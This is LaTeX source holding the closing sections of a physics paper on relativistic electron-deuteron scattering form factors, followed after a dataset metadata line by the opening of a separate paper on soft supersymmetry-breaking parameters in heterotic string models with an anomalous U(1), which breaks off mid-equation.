interactions of the bound state, as defined by Eq.~(\ref{eq:A2mu}),
exactly obeys
\begin{equation}
Q^\mu {\cal A}^{(2)}_\mu=0.
\label{eq:A1WTI}
\end{equation}
It is straightforward to check that the same result holds if
Eq.~(\ref{eq:calGeq}) for $K_1$ is truncated at fourth order, while
the one-body and two-body current pieces are expanded to fourth order.
The amplitude ${\cal A}_\mu^{(2)}$ includes contributions from
diagrams where the photon couples to particles one and two while
exchanged quanta are ``in-flight''. These contributions are of two
kinds. Firstly, if the four-dimensional kernel $K$ is dependent on
the total momentum, or if it involves the exchange of charged
particles, then the WTIs in the 4D theory require that $K_\mu^\gamma$
contain terms involving the coupling of the photon to internal lines
in $K$. Secondly, even if such terms are not present, terms arise in
the three-dimensional formalism where the photon couples to particles
one and two while an exchanged meson is ``in-flight''. These must be
included if our 3D approach is to lead to a conserved current. (See
Fig.~\ref{fig-inflight} for one such mechanism.)
\begin{figure}[h]
\centerline{\BoxedEPSF{fig2.eps scaled 350}}
\caption{One example of a two-body current that is required in our formalism
in order to maintain current conservation.}
\label{fig-inflight}
\end{figure}
A special case of the above results occurs when retardation effects
are omitted, i.e., the kernel $K_1=K_{\rm inst}$, is chosen, and the
bound-state equation (\ref{eq:3Deqn}) is solved to get the vertex
function $\Gamma_1=\Gamma_{\rm inst}$. Then a simple conserved current
is found:
\begin{equation}
{\cal A}_{{\rm inst},\mu}=\bar{\Gamma}_{\rm inst}(P') \langle
G_{0 \mu}^\gamma \rangle \Gamma_{\rm inst}(P) + \bar{\Gamma}_{\rm
inst}(P') \langle G_0(P') \rangle {K^\gamma_{\rm inst}}_\mu
\langle G_0(P) \rangle \Gamma_{\rm inst}(P),
\label{eq:instantme}
\end{equation}
where we have also replaced the meson-exchange current kernel
$K^\gamma_\mu$ by the instant approximation to it.
\subsection{Current conservation in the 4D formalism with $G_C$}
In Ref.~\cite{PW98} we showed how to construct a conserved current
consistent with the 4D equation
\begin{equation}
\Gamma=U (G_0 + G_C) \Gamma.
\label{eq:4DET}
\end{equation}
This turns out to be a moderately complicated exercise, because the
propagator $G_C$ depends on the three-momenta of particles one and
two, not only in the usual way, but also through the choice
(\ref{eq:kappachoice}) made for $\kappa_2^0$ above. However, a 4D
current ${\cal G}_{0,\mu}^\gamma = {G_0^\gamma}_\mu +
{G_C^\gamma}_\mu$ corresponding to the free Green's function $G_0 +
G_C$ can be constructed. Its form is displayed in Ref.~\cite{PW98} and
is not really germane to our purposes here, for, as we shall see
hereafter, only certain pieces of the current ${\cal
G}_{0,\mu}^\gamma$ are actually used in our calculations.
\subsection{Reduction to 3D and the ET current}
Having constructed a 4D current for the formalism involving $G_C$ that
obeys the required Ward-Takahashi identity, we can apply the reduction
formalism of Section~\ref{sec-3Dcurrents} to obtain the currents
corresponding to the 3D reduction of this 4D theory. The result is:
\begin{eqnarray}
{\cal A}^{(2)}_\mu&=&\bar{\Gamma}_{1,{\rm ET}}(P') \langle {\cal
G}^\gamma_{0,\mu} \rangle \Gamma_{1,{\rm ET}}(P) \nonumber\\
&+& \bar{\Gamma}_{1,{\rm ET}}(P') \langle
(G_0 + G_C)(P') (K^{(2)}(P')-U_1^{(2)}(P')) {\cal G}^\gamma_{0,\mu}
\rangle \Gamma_{1,{\rm ET}}(P)
\nonumber\\
&+& \bar{\Gamma}_{1,{\rm ET}}(P') \langle {\cal G}^{\gamma}_{0,\mu}
(K^{(2)}(P)-U_1^{(2)}(P)) (G_0 + G_C)(P) \rangle \Gamma_{1,{\rm ET}}(P)
\nonumber\\
&+& \bar{\Gamma}_{1,{\rm ET}}(P') \langle (G_0 + G_C)(P') K^{\gamma (2)}_\mu
(G_0 + G_C)(P) \rangle \Gamma_{1,{\rm ET}}(P),
\label{eq:general3DETcurrent(2)}
\end{eqnarray}
where $\Gamma_{1,{\rm ET}}$ is the solution of Eq.~(\ref{eq:3DET}) with
$U_1=U_1^{(2)}$.
This current obeys the appropriate Ward-Takahashi identity. In fact in
one-boson exchange models the only contributions to $K^{\gamma
(2)}_\mu$ give rise to isovector structures, and so their
contribution to electromagnetic scattering off the deuteron is zero.
\subsection{Impulse-approximation current based on the instant
approximation to ET formalism}
Just as in the case of the Bethe-Salpeter equation, if the instant
approximation is used to obtain a bound-state equation with an instant
interaction from Eq.~(\ref{eq:4DET}) then a corresponding simple
conserved impulse current can be constructed:
\begin{equation}
{\cal A}_{{\rm inst},\mu}=\bar{\Gamma}_{\rm inst}
\langle {\cal G}^\gamma_{0,\mu} \rangle
\Gamma_{\rm inst}.
\end{equation}
Now we note that the full result for ${\cal G}^\gamma_{0,\mu}$ was
constructed in order to obey Ward-Takahashi identities in the full
four-dimensional theory. It is not necessary to use this result if we
are only concerned with maintaining WTIs at the three-dimensional
level in the instant approximation. Therefore we may construct the
corresponding current
\begin{eqnarray}
&& {\cal G}_{{\rm inst},\mu}^\gamma({\bf p}_1,{\bf p}_2;P,Q)=i \langle d_1(p_1)
d_2(p_2+Q) j^{(2)}_\mu d_2(p_2) \nonumber\\
&& \qquad + d_1(p_1) d_2^{\tilde{c}}(p_2+Q) j^{(2)}_{c,\mu} d_2^c(p_2) \rangle
+ (1 \leftrightarrow 2).
\end{eqnarray}
Here $d_i$ is the Dirac propagator for particle $i$, and $j_\mu=q
\gamma_\mu$ is the usual one-body current, with $q$ is the charge of
the particle in question. Meanwhile $d_i^c$ is a one-body Dirac
propagator used in $G_C(P)$ to construct the approximation to the
crossed-ladder graphs. Correspondingly, $d_i^{\tilde{c}}$ appears in
$G_C(P+Q)$, which does {\it not} equal $d_i^c$, even if particle $i$
is not the nucleon struck by the photon. Finally,
\begin{equation}
j^{(2)}_{c,\mu}= q_2 \gamma_\mu - \tilde{j}^{(2)}_\mu,
\end{equation}
where
\begin{equation}
\tilde{j}^{(2)}_\mu=q_2 \frac{\hat{p}_{2 \mu}' + \hat{p}_{2
\mu}}{\epsilon_2' + \epsilon_2} {\gamma_{2}}_0,
\label{eq:tildej2}
\end{equation}
with $\hat{p}_2=(\epsilon({\bf p}_2),{\bf p}_2)$. (For further
explanation of these quantities and the necessity of their appearance
here the reader is referred to Ref.~\cite{PW98}.)
If a vertex function $\Gamma_{{\rm inst}}$ is constructed to be a
solution to Eq.~(\ref{eq:3DET}) with an instant interaction then the
three-dimensional hadronic current:
\begin{equation}
{\cal A}_{{\rm inst},\mu}= \bar{\Gamma}_{\rm inst} {\cal G}_{{\rm inst},\mu}^\gamma \Gamma_{\rm inst}
\label{eq:instAmu}
\end{equation}
is conserved. This current is simpler than the full ET current and
omits only effects stemming from retardation in the current. Our
present calculations are designed to provide an assessment of the role
of negative-energy states and retardation effects in the vertex
functions. Therefore we use the simple current (\ref{eq:instAmu}) in
{\it all} of our calculations here---even the ones where $\Gamma_1$ is
calculated using a retarded two-body interaction. The effects stemming
from retardation in the current are expected to be minor, and so we
expect this to be a good approximation to the full current in the
three-dimensional theory. Future calculations should be performed to
check the role of meson retardation in that current.
\section{Results for electron-deuteron scattering}
\label{sec-Section6}
\subsection{Impulse approximation}
We are now ready to calculate the experimentally observed deuteron
electromagnetic form factors $A$ and $B$, and the tensor polarization
$T_{20}$. These are straightforwardly related to the charge,
quadrupole, and magnetic form factors of the deuteron, $F_C$, $F_Q$,
and $F_M$. These form factors in turn are related to the Breit frame
matrix elements of the current ${\cal A}_\mu$ discussed in the
previous section,
\begin{eqnarray}
F_C&=&\frac{1}{3\sqrt{1 + \eta}e} (\langle 0|{\cal A}^0| 0 \rangle
+ 2 \langle +1|{\cal A}^0|+1 \rangle),\\
F_Q&=&\frac{1}{2 \eta \sqrt{1 + \eta} e} (\langle 0|{\cal A}^0| 0 \rangle
- \langle +1|{\cal A}^0|+1 \rangle),\\
F_M&=& \frac{-1}{\sqrt{2 \eta (1 + \eta)}e} \langle +1|{\cal A}_+|0\rangle,
\end{eqnarray}
where $|+1 \rangle$, $|0 \rangle$ and $|-1 \rangle$ are the
three different spin states of the deuteron.
We take the wave functions constructed for the four different
interactions of Section~\ref{sec-Section4} and insert them into the
expression (\ref{eq:instAmu}). In using any of the interactions
obtained with only positive-energy state propagation we drop all
pieces of the operator ${\cal G}^\gamma_{{\rm inst},\mu}$ in
negative-energy sectors.
The single-nucleon current used in these calculations is the usual one
for extended nucleons. We choose to parametrize the single-nucleon
form factors $F_1$ and $F_2$ via the 1976 Hohler fits~\cite{Ho76}.
Choosing different single-nucleon form factors does not affect our
qualitative conclusions, although it has some impact on our
quantitative results for $A$, $B$, and $T_{20}$.
Using this one-body current we then calculate the current matrix
elements via Eq.~(\ref{eq:Amu}). This is a conserved current if the
vertex function $\Gamma_1$ is calculated from an instant potential.
However, if a potential including meson retardation is used it
violates the Ward-Takahashi identities by omission of pieces that are
required because of the inclusion of retardation effects in the
calculation. Work is in progress to estimate the size of these
effects.
\begin{figure}[htbp]
\centerline{\BoxedEPSF{IA.eps scaled 500}}
\caption{The form factors $A(Q^2)$ and $B(Q^2)$ and the tensor
polarization $T_{20}$ for the deuteron calculated in impulse
approximation. The dash-dotted line represents a calculation using a
vertex function generated using the instant interaction. Meanwhile
the solid line is the result obtained with the retarded vertex
function. The dotted and long dashed lines are obtained by
performing a calculations with instant and retarded interactions in which
no negative-energy states are included.}
\label{fig-IA}
\end{figure}
The results for the impulse approximation calculation of the
experimental observables $A$, $B$, and $T_{20}$ are displayed in
Fig.~\ref{fig-IA}. We also show experimental data from
Refs.~\cite{El69,Ar75,Si81,Cr85,Pl90} for $A$, from
Refs.~\cite{Si81,Cr85,Au85,Bo90} for $B$ and from
Ref.~\cite{Sc84} for $T_{20}$. A number of
two-body effects must be added to our calculations before they can be
reliably compared to experimental data. However, even here we see the
close similarity of the results for these observables in all four
calculations. The only really noticeable difference occurs at the
minimum in $B$. There, including the negative-energy states in the
calculation shifts the minimum to somewhat larger $Q^2$. A similar
effect was observed by van Orden {\it et al.}~\cite{vO95} in
calculations of electron-deuteron scattering using the spectator
formalism. However, note that here, in contradistinction to the
results of Ref.~\cite{vO95}, the inclusion of negative-energy states
does {\it not} bring the impulse approximation calculation into
agreement with the data.
The fact that negative-energy states seem to have a smaller effect on
observables in the ET analysis than in the spectator analysis of van
Orden et al.~\cite{vO95} is somewhat surprising since our ``ET''
propagator has twice the negative-energy state propagation amplitude
of the spectator propagator. Thus, other differences between the ET and
spectator models, not just differences in the role of negative-energy
states in the two approaches, appear to be responsible for Ref.~\cite{vO95}'s
success in reproducing the minimum in $B$.
For the tensor polarization $T_{20}$ the different models produce
results which are very similar. This suggests that this observable is
fairly insensitive to dynamical details of the deuteron model, at
least up to $Q^2=4 \,\, \rm{GeV}^2$.
\subsection{Meson-exchange currents}
As $Q^2$ increases the cross-section due to the impulse approximation
diagrams drops precipitously. Thus we expect that in some regime other
interactions may become competitive with the impulse mechanism. One
such possibility is that the photon will couple to a meson while that
meson is in flight. Because of the deuteron's isoscalar nature and
the conservation of G-parity, the lowest mass state which can
contribute in such meson-exchange current (MEC) diagrams is one where
the photon induces a transition from a $\pi$ to a $\rho$.
This $\rho \pi \gamma$ MEC is a conserved current whose structure can
be found in Refs.~\cite{HT89,De94}. The couplings and form factors for
the meson-nucleon-nucleon vertices are all taken to be consistent with
those used in our one-boson-exchange interaction. Meanwhile, the $\rho
\pi \gamma$ coupling is set to the value $g_{\rho \pi \gamma}=0.56$,
and a vector meson dominance form factor is employed at the $\rho \pi
\gamma$ vertex: $F_{\rho \pi \gamma}(q)=1/(q^2 - m_\omega^2)$. The
value of this MEC is added to the impulse contribution calculated
above and $A$, $B$, and $T_{20}$ are calculated. This is done with the
vertex function obtained from an instant interaction, and consequently
the electromagnetic current is exactly conserved. The results of this
calculation are displayed in Fig.~\ref{fig-RPG}. We see that at $Q^2$
of order 2 ${\rm GeV}^2$ the $\rho \pi \gamma$ MEC makes a significant
contribution to all three observables. However, far from improving the
agreement of the position of the minimum in the $B$ form factor with
the experimental data, this particular MEC moves the theoretical result
{\it away} from the data---as noted by Hummel and Tjon~\cite{HT89},
and seen within a simplified version of the formalism presented here
by Devine~\cite{De94}. Thus, it would seem that some physics beyond
the impulse approximation other than the $\rho \pi \gamma$ MEC plays a
significant role in determining the position of the minimum in
$B(Q^2)$.
\begin{figure}[htbp]
\centerline{\BoxedEPSF{RPG.eps scaled 500}}
\caption{The form factors $A(Q^2)$ and $B(Q^2)$ together with the
tensor polarization for the deuteron. The long dashed line is an
impulse approximation calculation with an instant interaction. The
solid line includes the effect of the $\rho \pi \gamma$
MEC.}
\label{fig-RPG}
\end{figure}
\section{Conclusion}
\label{sec-Section7}
A systematic theory of the electromagnetic interactions of
relativistic bound states is available in three dimensions. In this
formalism integrations are performed over the zeroth component of the
relative momentum of the two particles, leading to the construction of
``equal-time'' (ET) Green's functions. If the formalism is to
incorporate the Z-graphs that are expected in a quantum field theory,
then the propagator must include terms coming from crossed Feynman
graphs. Here we have displayed a three-dimensional propagator that
includes these effects correctly to leading order in $1/M$.
Given a suitable choice for the ET propagator, the electromagnetic and
interaction currents which should be used with it can be calculated.
If these are truncated in a fashion consistent with the truncation of
the $NN$ interaction in the hadronic field theory then the
Ward-Takahashi identities are maintained in the three-dimensional
theory. A full accounting of the dynamical role played by
negative-energy states and of retardations in electromagnetic
interactions of the deuteron is thereby obtained.
Calculations have been performed for both the impulse approximation
and when the $\rho \pi \gamma$ MEC is included. In our MEC
calculations we use an instant approximation for the electromagnetic
current. This current satisfies current conservation when used with
deuteron vertex functions that are calculated with instant interactions.
We also have used this simpler current with vertex functions which
are calculated with the retarded interactions obtained within the
ET formalism.
Comparing impulse approximation calculations with and without
negative-energy states indicates that the role played by
negative-energy state components of the deuteron vertex function is
small. This corroborates the results of Hummel and Tjon and is in
contrast to those obtained in Ref.~\cite{vO95}. Because the ET
formalism incorporates the relevant Z-graphs in a preferable way, we
are confident that these Z-graphs really do play only a minor role in
calculations that are based upon standard boson-exchange models of the
$NN$ interaction.
The results for impulse approximation calculations of the
electromagnetic observables are relatively insensitive to the
distinction between a vertex calculated with retardations included and
one calculated in the instantaneous approximation. The results of both
calculations fall systematically below experimental data for the form
factors $A$ and $B$ for $Q$ of order 1 GeV. This deficiency at higher
$Q$ suggests that mechanisms other than the impulse approximation
graph should be significant. Indeed, when the $\rho \pi \gamma$ MEC
graph is included in our calculation it somewhat remedies the result
for $A(Q^2)$. However, it fails to narrow the gap between our result
for $B(Q^2)$ and the existing experimental data. The significant gap
that remains between our theoretical result for $B(Q^2)$ and the data
indicates that it is an interesting observable in which to look for
physics of the deuteron other than the simple impulse mechanism or the
standard $\rho \pi \gamma$ MEC. Finally, the existing tensor
polarization data are reasonably well described. This is consistent
with previous analyses which have shown $T_{20}$ to be less sensitive
to non-impulse mechanisms.
\section*{Acknowledgments}
It is a pleasure to thank Steve Wallace for a fruitful and enjoyable
collaboration on this topic, and for his comments on this manuscript.
I am also very grateful to Neal Devine for giving us the original
version of the computer code to calculate these reactions, and to
Betsy Beise for useful information on the experimental situation.
Finally, I want to thank the organizers of this workshop for a
wonderful week of physics in Elba! This work was supported by the U.~S.
Department of Energy under grant no. DE-FG02-93ER-40762.
| 2024-02-18T23:40:13.696Z | 1998-11-03T05:53:17.000Z | algebraic_stack_train_0000 | 1,738 | 7,018 |
|
proofpile-arXiv_065-8506 | \section{Introduction}
Superstring theories are powerful candidates for the unification
theory of all forces including gravity.
The supergravity theory (SUGRA) is effectively constructed from
4-dimensional
(4D) string model using several methods \cite{ST-SG,OrbSG,OrbSG2}.
The structure of SUGRA is constrained
by gauge symmetries including an anomalous $U(1)$ symmetry
($U(1)_A$) \cite{ST-FI} and stringy symmetries
such as duality \cite{duality}.
4D string models have several open questions and
two of them are pointed out here.
The first one is what the origin of supersymmetry (SUSY) breaking is.
Although intersting scenarios
such as SUSY breaking mechanism due to gaugino condensation \cite{gaugino}
and Scherk-Schwarz mechanism \cite{SS}
have been proposed, realistic one has not been identified yet.
The second one is how the vacuum expectation value (VEV) of dilaton
field $S$ is stabilized.
It is difficult to realize the stabilization with a realistic VEV of $S$
using a K\"ahler potential at the tree level alone
without any conspiracy among several terms which
appear in the superpotential \cite{S-Stab}.
A K\"ahler potential generally receives radiative
corrections as well as non-perturbative ones.
Such corrections may be sizable for the part related to
$S$ \cite{corr1,corr2}.
It is important to solve these enigmas
in order not only to understand the structure of more fundamental theory
at a high energy scale but also to know the complete SUSY particle spectrum
at the weak scale, but it is not an easy task
because of ignorance of the explicit forms of
fully corrected total K\"ahler potential.
At present, it would be meaningful to get any information on SUSY
particle spectrum model-independently.\footnote{
The stability of $S$ and soft SUSY breaking parameters are discussed
in the dilaton SUSY breaking scenario in Ref.\cite{Casas}.}
In this paper, we study the magnitudes of soft SUSY breaking parameters
in heterotic string models with $U(1)_A$ and derive model-independent
predictions for them
without specifying SUSY breaking mechanism
and the dilaton VEV fixing mechanism.
The idea is based on that in the work by Ref.\cite{ST-soft}.
The soft SUSY breaking terms have been derived from
$\lq\lq$standard string model" and analyzed
under the assumption that SUSY is broken by $F$-term condensations
of the dilaton field and/or moduli fields $M^i$.
We relax this assumption such that
SUSY is broken by $F$-term condensation of $S$, $M^i$ and/or
matter fields with non-vanishing $U(1)_A$ charge
since the scenario based on $U(1)_A$ as a mediator
of SUSY breaking is also possible \cite{DP}.
In particular, we make a comparison of magnitudes between
$D$-term contribution to scalar masses and $F$-term ones and
a comparison of magnitudes among scalar masses, gaugino masses
and $A$-parameters.
The features of our analysis are as follows.
The study is carried out in the framework of SUGRA
model-independently,\footnote{The model-dependent analyses are carried out
in Ref.\cite{DP,model-dep1,model-dep2}.}
i.e., we do not specify SUSY breaking mechanism, extra matter contents,
the structure of superpotential and
the form of K\"ahler potential related to $S$.
We treat all fields including $S$ and $M^i$ as dynamical fields.
The paper is organized as follows.
In the next section, we explain the general structure of SUGRA briefly
with some basic assumptions of SUSY breaking.
We study the magnitudes of soft SUSY breaking parameters
in heterotic string models with $U(1)_A$ model-independently in section 3.
Section 4 is devoted to conclusions and some comments.
\section{General structure of SUGRA}
We begin by reviewing the scalar potential in SUGRA \cite{SUGRA,JKY}.
It is specified by two functions, the total K\"ahler
potential $G(\phi, \bar \phi)$ and the gauge kinetic function
$f_{\alpha \beta}(\phi)$ with $\alpha$, $\beta$ being indices of
the adjoint representation of the gauge group.
The former is a sum of the K\"ahler potential $K(\phi, \bar \phi)$
and (the logarithm of) the superpotential $W(\phi)$
\begin{equation}
G(\phi, \bar \phi)=K(\phi, \bar \phi) +M^{2}\ln |W (\phi) /M^{3}|^2
\label{total-Kahler}
\end{equation}
where $M=M_{Pl}/\sqrt{8\pi}$ with $M_{Pl}$ being the Planck mass, and is
referred to as the gravitational scale.
We have denoted scalar fields in the chiral multiplets by $\phi^I$
and their complex conjugate by $\bar \phi_J$.
The scalar potential is given by
\begin{eqnarray}
V &=& M^{2}e^{G/M^{2}} (G_I (G^{-1})^I_J G^J-3M^{2})
+ \frac{1}{2} (Re f^{-1})_{\alpha \beta} \hat D^{\alpha} \hat D^{\beta}
\label{scalar-potential}
\end{eqnarray}
where
\begin{eqnarray}
\hat D^\alpha = G_I ( T^\alpha \phi)^I = (\bar \phi T^\alpha)_J G^J.
\label{hatD}
\end{eqnarray}
Here $G_I=\partial G/\partial \phi^I$,
$G^J=\partial G/\partial \bar \phi_J$ etc, and
$T^\alpha$ are gauge transformation generators.
Also in the above, $(Re f^{-1})_{\alpha \beta}$ and
$(G^{-1})^I_J$ are the inverse matrices of $Re f_{\alpha \beta}$ and
$G^I_J$, respectively, and a summation over $\alpha$,... and $I$,... is
understood.
The last equality in Eq.(\ref{hatD}) comes from the
gauge invariance of the total K\"ahler potential.
The $F$-auxiliary fields of the chiral multiplets are given by
\begin{equation}
F^I =Me^{G/2M^{2}} (G^{-1})^I_J G^J.
\label{F}
\end{equation}
The $D$-auxiliary fields of the vector multiplets are given by
\begin{equation}
D^{\alpha} = (Re f^{-1})_{\alpha\beta} \hat{D}^{\beta}.
\label{D}
\end{equation}
Using $F^I$ and $D^\alpha$, the scalar potential is rewritten down by
\begin{eqnarray}
V &=& V_F + V_D , \nonumber \\
V_F &\equiv& F_I K^I_J F^J - 3M^{4} e^{G/M^{2}} ,
\label{VF}\\
V_D &\equiv& \frac{1}{2} Re f_{\alpha \beta} D^{\alpha} D^{\beta}.
\label{scalar-potential 2}
\end{eqnarray}
Let us next summarize our assumptions on SUSY breaking.
The gravitino mass $m_{3/2}$ is given by
\begin{equation}
m_{3/2}= \langle Me^{G/2M^{2}} \rangle
\label{gravitino}
\end{equation}
where $\langle \cdots \rangle$ denotes the VEV.
As a phase convention, it is taken to be real.
We identify the gravitino mass with the weak scale in most cases.
It is assumed that SUSY is spontaneously broken by some $F$-term condensations
($\langle F \rangle \neq 0$) for singlet fields under
the standard model gauge group
and/or some $D$-term condensations ($\langle D \rangle \neq 0$)
for broken gauge symmetries.
We require that the VEVs of $F^I$ and $D^{\alpha}$ should satisfy
\begin{eqnarray}
&~& \langle (F_I K^I_J F^J)^{1/2} \rangle \leq O(m_{3/2}M) ,
\label{VEV-F} \\
&~& \langle D^\alpha \rangle \leq O(m_{3/2}M)
\label{VEV-D}
\end{eqnarray}
for each pair $(I,J)$ in Eq.(\ref{VEV-F}).
Note that we allow the non-zero vacuum energy $\langle V \rangle$
of order $m_{3/2}^2 M^2$ at this level, which could be canceled
by quantum corrections.
In order to discuss the magnitudes of several quantities, it is
necessary to see consequences of the stationary condition
$\langle \partial V /\partial \phi^I \rangle =0$. From
Eq.(\ref{scalar-potential}), we find
\begin{eqnarray}
\partial V /\partial \phi^I &=& G_I ( {V_F \over M^2}
+ M^{2}e^{G/M^{2}} ) + M e^{G/2M^{2}} G_{IJ} F^J \nonumber \\
&~& - F_{I'} G^{I'}_{J'I} F^{J'}
- \frac{1}{2} (Re f_{\alpha \beta}),_I D^\alpha D^\beta
\nonumber \\
&~& + D^\alpha (\bar \phi T^\alpha )_J G^J_I .
\label{VI}
\end{eqnarray}
Taking its VEV and using the stationary condition, we derive the formula
\begin{eqnarray}
m_{3/2} \langle G_{IJ} \rangle \langle F^J \rangle &=&
- \langle G_I \rangle ( {\langle V_F \rangle \over M^2} + m_{3/2}^2 )
+ \langle F_{I'} \rangle \langle G^{I'}_{J'I} \rangle
\langle F^{J'} \rangle
\nonumber \\
&~& + \frac{1}{2} \langle (Re f_{\alpha \beta}),_I \rangle
\langle D^\alpha \rangle \langle D^\beta \rangle
- \langle D^\alpha \rangle \langle (\bar \phi T^\alpha )_J \rangle
\langle G^J_I \rangle .
\label{<VI>}
\end{eqnarray}
We can estimate the magnitude of SUSY mass parameter
$\mu_{IJ} \equiv m_{3/2} (\langle G_{IJ} \rangle + \langle G_{I} \rangle
\langle G_{J} \rangle/M^2 - \langle G_{I'} (G^{-1})^{I'}_{J'}
G^{J'}_{IJ} \rangle)$ using Eq.(\ref{<VI>}).
By multiplying $(T^\alpha \phi)^I$ to Eq.(\ref{VI}),
a heavy-real direction is projected on.
Using the identities derived from the gauge
invariance of the total K\"ahler potential
\begin{eqnarray}
& & G_{IJ}(T^\alpha \phi)^J + G_J (T^\alpha )_I^J
- K^J_I(\bar \phi T^\alpha)_J = 0,
\\
& & K_{IJ'}^J (T^\alpha \phi)^{J'} + K^J_{J'} (T^\alpha)^{J'}_I
-[G^{J'} (\bar \phi T^\alpha )_{J'}]_I^J = 0,
\end{eqnarray}
we obtain
\begin{eqnarray}
{\partial V \over \partial \phi^I} (T^\alpha \phi)^I &=&
( {V_F \over M^2} + 2 M^2 e^{G/M^2} ) \hat D^\alpha
- F_I F^J (\hat{D}^{\alpha})^I_J
\nonumber \\
&~& - \frac{1}{2} (Re f_{\beta \gamma}),_I (T^\alpha \phi)^I
D^\beta D^\gamma
+ (\bar \phi T^\beta)_J G^J_I (T^\alpha \phi)^I D^\beta .
\label{VI2}
\end{eqnarray}
Taking its VEV and using the stationary condition,
we derive the formula
\begin{eqnarray}
&~& \{ {(M_V^2)^{\alpha\beta} \over 2g_\alpha g_\beta}
+ ({\langle V_F \rangle \over M^2} + 2 m_{3/2}^2)
\langle Re f_{\alpha\beta} \rangle \} \langle D^\beta \rangle
= \langle F_I \rangle \langle F^J \rangle
\langle (\hat{D}^{\alpha})^I_J \rangle \nonumber \\
&~& ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ \frac{1}{2} \langle (Re f_{\beta \gamma}),_I \rangle
\langle (T^\alpha \phi)^I \rangle
\langle D^\beta \rangle \langle D^\gamma \rangle
\label{<VI2>}
\end{eqnarray}
where $(M_{V}^{2})^{\alpha \beta}=
2g_\alpha g_\beta \langle (\bar \phi T^\beta)_J K^J_I
(T^\alpha \phi)^I \rangle$
is the mass matrix of the gauge bosons and
$g_\alpha$ and $g_\beta$ are the gauge coupling constants.
Using Eq.(\ref{<VI2>}), we can estimate the magnitude of
$D$-term condensations $\langle D^\beta \rangle$.
Using the scalar potential and gauge kinetic terms,
we can obtain formulae of soft
SUSY breaking scalar masses $(m^2)_I^J$, soft SUSY breaking
gaugino masses $M_{\alpha}$ and $A$-parameters $A_{IJK}$ \cite{KMY2,Kawa1},
\begin{eqnarray}
(m^2)^J_I &=& (m^2_F)^J_I + (m^2_D)^J_I , \\
(m^2_F)^J_I &\equiv& (m_{3/2}^2 + {\langle V_F \rangle \over M^2})
\langle K^J_I \rangle \nonumber \\
& & + \langle {F}^{I'} \rangle
\langle ({K}_{I'I}^{I"} (K^{-1})^{J"}_{I"}
{K}^{JJ'}_{J"} - {K}_{I'I}^{J'J}) \rangle \langle {F}_{J'} \rangle + \cdots
\label{mF} ,\\
(m^2_D)^J_I &\equiv& \sum_{\hat{\alpha}} q^{\hat{\alpha}}_{I}
\langle D^{\hat{\alpha}} \rangle \langle K^J_I \rangle ,
\label{mD} \\
M_\alpha &=& \langle F^I \rangle \langle (Re f_\alpha)^{-1} \rangle
\langle f_\alpha,_I \rangle
\label{Ma} ,\\
A_{IJK} &=& \langle F^{I'} \rangle (\langle f_{IJK},_{I'} \rangle
+ {\langle K_{I'} \rangle \over M^2} \langle f_{IJK} \rangle
\nonumber \\
&~& - \langle K_{(II'}^{J'} \rangle \langle (K^{-1})_{J'}^{J"} \rangle
\langle f_{J"JK)} \rangle )
\label{A}
\end{eqnarray}
where the index $\hat{\alpha}$ runs over broken gauge generators,
$Re f_\alpha \equiv Re f_{\alpha\alpha}$ and $f_{IJK}$'s are Yukawa
couplings some of which are moduli-dependent.
The $(I \cdots JK)$ in Eq.(\ref{A}) stands for a cyclic permutation
among $I$, $J$ and $K$.
The ellipsis in $(m^2_F)^J_I$ stands for extra $F$-term contributions
and so forth.
The $(m^2_D)^J_I$ is a $D$-term contribution
to scalar masses.
\section{Heterotic string model with anomalous $U(1)$}
Effective SUGRA is derived from 4D string models taking a field
theory limit.
In this section, we study soft SUSY breaking parameters
in SUGRA from heterotic string model with $U(1)_A$.\footnote{
Based on the assumption that SUSY is broken by $F$-components of
$S$ and/or a moduli field, properties of
soft SUSY breaking scalar masses have been studied in Ref.\cite{N,KK}.}
Let us explain our starting point and assumptions first.
The gauge group $G=G_{SM} \times U(1)_A$ originates from the
breakdown of $E_8 \times E_8'$ gauge group.
Here $G_{SM}$ is a standard model gauge group
$SU(3)_C \times SU(2)_L \times U(1)_Y$ and $U(1)_A$ is an anomalous $U(1)$
symmetry.
The anomaly is canceled by the Green-Schwarz mechanism \cite{GS}.
Chiral multiplets are classified into two categories.
One is a set of $G_{SM}$ singlet fields which the dilaton field
$S$, the moduli fields $M^i$ and
some of matter fields $\phi^m$ belong to.
The other one is a set of $G_{SM}$ non-singlet
fields $\phi^k$.
We denote two types of matter multiplet as
$\phi^\lambda = \{\phi^m, \phi^k\}$ .
The dilaton field $S$ transforms as
$S \rightarrow S-i\delta_{GS}^{A} M \theta(x)$ under $U(1)_A$
with a space-time dependent parameter $\theta(x)$.
Here $\delta_{GS}^{A}$ is so-called Green-Schwarz coefficient
of $U(1)_A$ and is given by
\begin{eqnarray}
\delta_{GS}^{A} &=& {1 \over 96\pi^2}Tr Q^A
= {1 \over 96\pi^2} \sum_{\lambda} q^A_{\lambda} ,
\label{delta_GS}
\end{eqnarray}
where $Q^A$ is a $U(1)_A$ charge operator,
$q^A_{\lambda}$ is a $U(1)_A$ charge of $\phi^{\lambda}$
and the Kac-Moody level of $U(1)_A$ is rescaled as $k_A=1$.
We find $|\delta_{GS}^{A}/q^A_m| = O(10^{-1}) \sim O(10^{-2})$
in explicit models \cite{KN,KKK}.
The requirement of $U(1)_A$ gauge invariance yields the form
of K\"ahler potential $K$ as,
\begin{eqnarray}
K &=& K(S + {\bar S} + \delta_{GS}^{A} V_A, M^i, {\bar M}^i,
{\bar \phi}_\mu e^{q^A_\mu V_A}, \phi^\lambda)
\label{K-st}
\end{eqnarray}
up to the dependence on $G_{SM}$ vector multiplets.
We assume that derivatives of the K\"ahler potential $K$ with respect to
fields including
moduli fields or matter fields are at most of order unity
in the units where $M$ is taken to be unity.
However we do not specify the magnitude of
derivatives of $K$ by $S$ alone.
The VEVs of $S$ and $M^i$ are supposed to be
fixed non-vanishing values by some non-perturbative effects.
It is expected that the stabilization of $S$ is
due to the physics at the gravitational scale $M$
or at the lower scale than $M$.
Moreover we assume that the VEV is much bigger than
the weak scale, i.e., $O(m_{3/2}) \ll \langle K_S \rangle$.
The non-trivial transformation property of $S$
under $U(1)_A$ implies that $U(1)_A$ is broken down at some high energy
scale $M_I$.
Hereafter we consider only the case with overall modulus
field $T$ for simplicity.
It is straightforward to apply our method to more complicated
situations with multi-moduli fields.
The K\"ahler potential is, in general, written by
\begin{eqnarray}
K &=& K^{(S)}(S + {\bar S} + \delta_{GS}^{A} V_A) +
K^{(T)}(T + {\bar T}) + K^{(S, T)}
\nonumber\\
